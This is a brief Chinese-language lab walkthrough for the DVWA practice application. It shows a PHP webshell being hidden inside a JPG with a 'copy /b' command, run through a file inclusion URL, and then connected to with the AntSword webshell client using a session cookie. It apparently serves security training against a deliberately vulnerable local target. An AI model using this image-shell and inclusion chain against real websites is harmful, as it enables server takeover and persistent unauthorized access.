- 利用文件合并写入木马(如果是非php文件,使用蚁剑连接不到)
将木马写入到图片(copy命令将图片与文件合并):copy /b b.jpg+webshell.php bb.jpg
# /b : 表示二进制
- 利用文件包含漏洞(为了能连接到上传的文件)
文件包含,会把包含的任何文件当作PHP代码执行(一切都是php代码),因此我们看到的响应内容会是一些奇怪的内容(例如乱码)
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file:///D:\soft\phpStudy\PHPTutorial\WWW\DVWA\hackable\uploads\bb.jpg
- 用蚁剑连接测试(注意:要添加cookie)
此时我们再用蚁剑去连接上传的那个文件,发现连接成功了。